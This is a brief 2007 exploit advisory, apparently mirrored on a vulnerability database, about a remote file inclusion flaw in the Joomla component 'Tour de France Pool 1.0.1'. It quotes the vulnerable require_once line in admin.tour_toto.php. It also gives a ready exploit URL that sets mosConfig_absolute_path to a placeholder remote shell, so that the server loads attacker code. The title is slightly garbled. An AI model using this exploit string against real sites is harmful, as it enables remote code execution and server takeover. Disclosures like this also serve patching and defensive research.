Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17674
HistoryAug 03, 2007 - 12:00 a.m.

our de France Pool 1.0.1 Remote File İnclude Bug

2007-08-0300:00:00
vulners.com
36

------------Yollubunlar.Org----------------

Title : Tour de France Pool 1.0.1 Remote File İnclude Bug

Author : Yollubunlar.Org

Orginal : http://yollubunlar.org/our-de-france-pool-101-remote-file-include-43.html

Mail : [email protected]

Down : http://joomla.bultena.com/component/option,com_remository/Itemid,26/func,download/id,19/chk,f9f89538d34c214c01bfc48dc276e762/lang,en/

Bug : in admin.tour_toto.php " require_once( $mosConfig_absolute_path.'/administrator/components/com_tour_toto/riders.php'); "

Exploit : site.com/path/administrator/components/com_tour_toto/admin.tour_toto.php?mosConfig_absolute_path=sHELL?

Greetz: Yollubunlar.Org

Not: Vatan Sagolsun ! Şehitler Olmez , Vatan Bolunmez "